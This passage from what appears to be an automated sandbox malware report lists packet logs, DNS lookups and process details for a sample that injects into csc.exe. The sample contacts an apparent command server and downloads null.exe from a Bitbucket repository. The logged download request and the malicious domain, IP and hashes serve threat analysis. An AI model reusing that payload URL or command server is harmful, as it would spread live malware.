Dec 12, 2024 17:55:04.353050947 CET	50042	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:55:04.354114056 CET	50042	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:55:04.474544048 CET	30203	50042	181.131.217.244	192.168.2.6
Dec 12, 2024 17:55:04.474607944 CET	50042	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:55:04.594510078 CET	30203	50042	181.131.217.244	192.168.2.6
Dec 12, 2024 17:55:05.683378935 CET	30203	50042	181.131.217.244	192.168.2.6
Dec 12, 2024 17:55:05.683474064 CET	50042	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:55:05.683615923 CET	50042	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:55:05.791811943 CET	50043	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:55:05.803617001 CET	30203	50042	181.131.217.244	192.168.2.6
Dec 12, 2024 17:55:05.911914110 CET	30203	50043	181.131.217.244	192.168.2.6
Dec 12, 2024 17:55:05.912807941 CET	50043	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:55:05.916964054 CET	50043	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:55:06.040826082 CET	30203	50043	181.131.217.244	192.168.2.6
Dec 12, 2024 17:55:06.041004896 CET	50043	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:55:06.161784887 CET	30203	50043	181.131.217.244	192.168.2.6
Dec 12, 2024 17:55:16.260966063 CET	30203	50043	181.131.217.244	192.168.2.6
Dec 12, 2024 17:55:16.261032104 CET	50043	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:55:16.261228085 CET	50043	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:55:16.373336077 CET	50044	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:55:16.382204056 CET	30203	50043	181.131.217.244	192.168.2.6
Dec 12, 2024 17:55:16.495083094 CET	30203	50044	181.131.217.244	192.168.2.6
Dec 12, 2024 17:55:16.495176077 CET	50044	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:55:16.496207952 CET	50044	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:55:16.615958929 CET	30203	50044	181.131.217.244	192.168.2.6
Dec 12, 2024 17:55:16.616029978 CET	50044	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:55:16.736004114 CET	30203	50044	181.131.217.244	192.168.2.6
Dec 12, 2024 17:55:17.808399916 CET	30203	50044	181.131.217.244	192.168.2.6
Dec 12, 2024 17:55:17.809191942 CET	50044	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:55:17.809278965 CET	50044	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:55:17.916990995 CET	50045	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:55:17.929069996 CET	30203	50044	181.131.217.244	192.168.2.6
Dec 12, 2024 17:55:18.036971092 CET	30203	50045	181.131.217.244	192.168.2.6
Dec 12, 2024 17:55:18.037115097 CET	50045	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:55:18.037938118 CET	50045	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:55:18.157813072 CET	30203	50045	181.131.217.244	192.168.2.6
Dec 12, 2024 17:55:18.158545017 CET	50045	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:55:18.278445005 CET	30203	50045	181.131.217.244	192.168.2.6
Dec 12, 2024 17:55:19.364737988 CET	30203	50045	181.131.217.244	192.168.2.6
Dec 12, 2024 17:55:19.366553068 CET	50045	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:55:19.366729021 CET	50045	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:55:19.479413033 CET	50046	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:55:19.486421108 CET	30203	50045	181.131.217.244	192.168.2.6
Dec 12, 2024 17:55:19.600123882 CET	30203	50046	181.131.217.244	192.168.2.6
Dec 12, 2024 17:55:19.600213051 CET	50046	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:55:19.601006031 CET	50046	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:55:19.720752001 CET	30203	50046	181.131.217.244	192.168.2.6
Dec 12, 2024 17:55:19.722572088 CET	50046	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:55:19.842529058 CET	30203	50046	181.131.217.244	192.168.2.6
Dec 12, 2024 17:55:20.908618927 CET	30203	50046	181.131.217.244	192.168.2.6
Dec 12, 2024 17:55:20.908690929 CET	50046	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:55:20.942189932 CET	50046	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:55:21.062124968 CET	30203	50046	181.131.217.244	192.168.2.6
Dec 12, 2024 17:55:21.074994087 CET	50047	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:55:21.196840048 CET	30203	50047	181.131.217.244	192.168.2.6
Dec 12, 2024 17:55:21.197055101 CET	50047	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:55:21.199212074 CET	50047	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:55:21.319073915 CET	30203	50047	181.131.217.244	192.168.2.6
Dec 12, 2024 17:55:21.319202900 CET	50047	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:55:21.439898968 CET	30203	50047	181.131.217.244	192.168.2.6
Dec 12, 2024 17:55:22.508546114 CET	30203	50047	181.131.217.244	192.168.2.6
Dec 12, 2024 17:55:22.508631945 CET	50047	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:55:22.508802891 CET	50047	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:55:22.621459961 CET	50048	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:55:22.628633976 CET	30203	50047	181.131.217.244	192.168.2.6
Dec 12, 2024 17:55:22.748245955 CET	30203	50048	181.131.217.244	192.168.2.6
Dec 12, 2024 17:55:22.748333931 CET	50048	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:55:22.749321938 CET	50048	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:55:22.869627953 CET	30203	50048	181.131.217.244	192.168.2.6
Dec 12, 2024 17:55:22.869820118 CET	50048	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:55:22.989772081 CET	30203	50048	181.131.217.244	192.168.2.6
Dec 12, 2024 17:55:24.071106911 CET	30203	50048	181.131.217.244	192.168.2.6
Dec 12, 2024 17:55:24.071557045 CET	50048	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:55:24.071660995 CET	50048	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:55:24.183129072 CET	50049	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:55:24.191556931 CET	30203	50048	181.131.217.244	192.168.2.6
Dec 12, 2024 17:55:24.303030968 CET	30203	50049	181.131.217.244	192.168.2.6
Dec 12, 2024 17:55:24.303126097 CET	50049	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:55:24.304346085 CET	50049	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:55:24.424151897 CET	30203	50049	181.131.217.244	192.168.2.6
Dec 12, 2024 17:55:24.424209118 CET	50049	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:55:24.544289112 CET	30203	50049	181.131.217.244	192.168.2.6
Dec 12, 2024 17:55:34.710676908 CET	30203	50049	181.131.217.244	192.168.2.6
Dec 12, 2024 17:55:34.710750103 CET	50049	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:55:34.710935116 CET	50049	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:55:34.823524952 CET	50050	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:55:34.837587118 CET	30203	50049	181.131.217.244	192.168.2.6
Dec 12, 2024 17:55:34.950329065 CET	30203	50050	181.131.217.244	192.168.2.6
Dec 12, 2024 17:55:34.950412035 CET	50050	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:55:34.951142073 CET	50050	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:55:35.072376966 CET	30203	50050	181.131.217.244	192.168.2.6
Dec 12, 2024 17:55:35.072510004 CET	50050	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:55:35.193413019 CET	30203	50050	181.131.217.244	192.168.2.6
Dec 12, 2024 17:55:38.292211056 CET	50050	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:55:38.416126966 CET	30203	50050	181.131.217.244	192.168.2.6
Dec 12, 2024 17:55:38.416316986 CET	50050	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:55:38.543005943 CET	30203	50050	181.131.217.244	192.168.2.6
Dec 12, 2024 17:55:43.452133894 CET	50050	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:55:43.578291893 CET	30203	50050	181.131.217.244	192.168.2.6
Dec 12, 2024 17:55:43.578367949 CET	50050	30203	192.168.2.6	181.131.217.244
Dec 12, 2024 17:55:43.698581934 CET	30203	50050	181.131.217.244	192.168.2.6
Dec 12, 2024 17:55:45.290700912 CET	30203	50050	181.131.217.244	192.168.2.6
Dec 12, 2024 17:55:45.290843010 CET	50050	30203	192.168.2.6	181.131.217.244

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 12, 2024 17:51:56.345653057 CET	64275	53	192.168.2.6	1.1.1.1
Dec 12, 2024 17:51:56.499450922 CET	53	64275	1.1.1.1	192.168.2.6
Dec 12, 2024 17:51:58.928719044 CET	56667	53	192.168.2.6	1.1.1.1
Dec 12, 2024 17:51:59.067850113 CET	53	56667	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 12, 2024 17:51:56.345653057 CET	192.168.2.6	1.1.1.1	0x195d	Standard query (0)	navegacionseguracol24vip.org	A (IP address)	IN (0x0001)	false
Dec 12, 2024 17:51:58.928719044 CET	192.168.2.6	1.1.1.1	0x33fe	Standard query (0)	bitbucket.org	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 12, 2024 17:51:56.499450922 CET	1.1.1.1	192.168.2.6	0x195d	No error (0)	navegacionseguracol24vip.org	181.131.217.244	A (IP address)	IN (0x0001)	false
Dec 12, 2024 17:51:59.067850113 CET	1.1.1.1	192.168.2.6	0x33fe	No error (0)	bitbucket.org	185.166.143.49	A (IP address)	IN (0x0001)	false
Dec 12, 2024 17:51:59.067850113 CET	1.1.1.1	192.168.2.6	0x33fe	No error (0)	bitbucket.org	185.166.143.50	A (IP address)	IN (0x0001)	false
Dec 12, 2024 17:51:59.067850113 CET	1.1.1.1	192.168.2.6	0x33fe	No error (0)	bitbucket.org	185.166.143.48	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

bitbucket.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49762	185.166.143.49	443	6536	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-12 16:52:00 UTC	101	OUT	GET /facturacioncol/fact/downloads/null.exe HTTP/1.1 Host: bitbucket.org Connection: Keep-Alive
2024-12-12 16:52:01 UTC	5939	IN	HTTP/1.1 302 Found Date: Thu, 12 Dec 2024 16:52:01 GMT Content-Type: text/html; charset=utf-8 Content-Length: 0 Server: AtlassianEdge Location: https://bbuseruploads.s3.amazonaws.com/986cb0ac-5fcf-4393-afaa-e2b223260ae9/downloads/47e1d263-9601-40cc-a367-13b7035db3ac/null.exe?response-content-disposition=attachment%3B%20filename%3D%22null.exe%22&AWSAccessKeyId=ASIA6KOSE3BNIK3V4DGT&Signature=CeSXCizIndXdpo0hNVhQNHPO6YE%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAkaCXVzLWVhc3QtMSJGMEQCIAiR1Rr4gukDYzqDqe6VyCYznX6djf6omD53N9z5eXxNAiAOa4oQ0hLIqn6hHaGwFLs9dy9CGpADmC9r%2BgzzvYixzCqwAgjC%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIMdLt8wvGnGxpQ3VhgKoQCe8wqaRBxnVnGmgCUhs6TWySAMRXKxScrbgQIw1l5TliYWycjvfrdQ9KAUuNMU%2FwhakGHoE0SFuTSYhrM1G9PRALReQarQNdwzYN63jorLJ4YWbF3XMNkCEIyc7ndfWAWAsw%2FfjWHG0%2BHTpx6RPw%2FIQG57%2Fn5zg5wiHWoPYYes5WgRI5TNywnrgMzT2HeQqLoN3qnaIg%2BAtnkqDKS5EY2FY6PH72PmOl7UVqeyAnEuwwblKQlwD8%2FDNIruRgkrhDndJwiNI%2Fjj%2Fbmpx1PYlG3DYXUkX3nG9qpqdlp9qaxg66RItC8i7CuMgnCQGyIpd9Ne8xvpXMpMHF7fcuhoxTOVxRBVHQwsaPsugY6ngFGmq3npFGM4oH6YpgZGTfIpeNNKlZdAXKSvIsR6TfEz3KZeh4E29gHAGlbMUmtWcvwuflus8R05%2FCWtxLjrJB20TKCSAJ0mZ7ha8acTW5DNuxqW4A6JSpacup [TRUNCATED] Expires: Thu, 12 Dec 2024 16:52:01 GMT Cache-Control: max-age=0, no-cache, no-store, must-revalidate, private X-Used-Mesh: False Vary: Accept-Language, Origin Content-Language: en X-View-Name: bitbucket.apps.downloads.views.download_file X-Dc-Location: Micros-3 X-Served-By: f4432853a972 X-Version: b7875da02c7c X-Static-Version: b7875da02c7c X-Request-Count: 950 X-Render-Time: 0.06357216835021973 X-B3-Traceid: d0240b7ce49c4adc84207f7445451cb9 X-B3-Spanid: 9cbd9f4663b092b3 X-Frame-Options: SAMEORIGIN Content-Security-Policy: style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/; script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend. [TRUNCATED] X-Usage-Quota-Remaining: 998921.669 X-Usage-Request-Cost: 1096.90 X-Usage-User-Time: 0.031752 X-Usage-System-Time: 0.001155 X-Usage-Input-Ops: 0 X-Usage-Output-Ops: 0 Age: 0 X-Cache: MISS X-Content-Type-Options: nosniff X-Xss-Protection: 1; mode=block Atl-Traceid: d0240b7ce49c4adc84207f7445451cb9 Atl-Request-Id: d0240b7c-e49c-4adc-8420-7f7445451cb9 Strict-Transport-Security: max-age=63072000; includeSubDomains; preload Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600} Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"} Server-Timing: atl-edge;dur=175,atl-edge-internal;dur=4,atl-edge-upstream;dur=173,atl-edge-pop;desc="aws-eu-central-1" Connection: close

Target ID:	1
Start time:	11:51:36
Start date:	12/12/2024
Path:	C:\Users\user\Desktop\hoTwj68T1D.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\hoTwj68T1D.exe"
Imagebase:	0x400000
File size:	1'958'096 bytes
MD5 hash:	045DECC006FC4AF07F572ACC9211EF53
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	11:51:53
Start date:	12/12/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
Imagebase:	0xfd0000
File size:	2'141'552 bytes
MD5 hash:	EB80BB1CA9B9C7F516FF69AFCFD75B7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.4659180152.0000000008582000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.4660531571.0000000009C20000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.4658171446.00000000073E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	0.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	14
Total number of Limit Nodes:	0

Executed Functions

Function 00486F85 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 38
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(00000000), ref: 00487008

Strings

, xrefs: 0048700F

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-399585960
Opcode ID: fb89caa407ce311291f009b91f019bd87ef3442d80077c8aaf622ecd3f605807
Instruction ID: 67386ea82c80b931445df2ec2af3a20bfd61e6d46f4a712d3bde01b782945862
Opcode Fuzzy Hash: fb89caa407ce311291f009b91f019bd87ef3442d80077c8aaf622ecd3f605807
Instruction Fuzzy Hash: 4D01DFB1E0522C8BEB30DA05EC417FDB7B0BB45325F0041EBDA1E96280C2749E858F82

Function 00486B2B Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(00000000), ref: 00487008

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: c3b54fd49215a3a10d358a3262311c965f18460f154581fb6d26903ec8fa7606
Instruction ID: 034f3bb200e64a4178f35f4e3a608836e05433d2e71d47eba89a4f198150ff19
Opcode Fuzzy Hash: c3b54fd49215a3a10d358a3262311c965f18460f154581fb6d26903ec8fa7606
Instruction Fuzzy Hash: E261EEB1D011298AEB209B15CD84BEEB779FF81304F0541FAD94DA6281EB385EC2CF15

Function 00486C2C Relevance: 1.7, APIs: 1, Instructions: 159
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(00000000), ref: 00487008

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 16273efd9d9e37df33e3530c34f47e1620dd2cd6fac9481b939736724bea6a5b
Instruction ID: 703ee70a0eca9f7916d251f2e79b48e3e942f5d71c31b294f3e0aa7bf232fe34
Opcode Fuzzy Hash: 16273efd9d9e37df33e3530c34f47e1620dd2cd6fac9481b939736724bea6a5b
Instruction Fuzzy Hash: 3A51CEB1D011298BEB209B25DD44BEEB779FF85300F0540FAD94D96281E6385EC2CF16

Function 00486986 Relevance: 1.6, APIs: 1, Instructions: 150
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(00000000), ref: 00487008

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 19812e6646f13d72df66945397bcca5bb2e1660904526f7779aa08091964e567
Instruction ID: 081c69691922de8b13ce8beee08b818055d3de941b95e3005d7ed5ff05aa68bc
Opcode Fuzzy Hash: 19812e6646f13d72df66945397bcca5bb2e1660904526f7779aa08091964e567
Instruction Fuzzy Hash: C551ABB1D041298BEB60DB24DC45BEAB779FF85300F0181FAD94D96380DA385EC68F56

Function 00486C83 Relevance: 1.6, APIs: 1, Instructions: 136
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(00000000), ref: 00487008

Memory Dump Source

Source File: 00000001.00000002.2408498738.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2408481888.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408560019.000000000049E000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408577291.00000000004A0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408594136.00000000004A3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408611067.00000000004AF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408636240.00000000004D4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408689633.000000000056A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408709176.000000000056D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408727901.0000000000578000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408744459.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408766814.0000000000581000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408785417.0000000000584000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408804378.000000000058B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408821201.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408846219.00000000005BE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.2408866879.00000000005C1000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_hoTwj68T1D.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 5a0831440ced4d63661c1935b7beef7b2fd5e56c13f236836b5d32444715f561
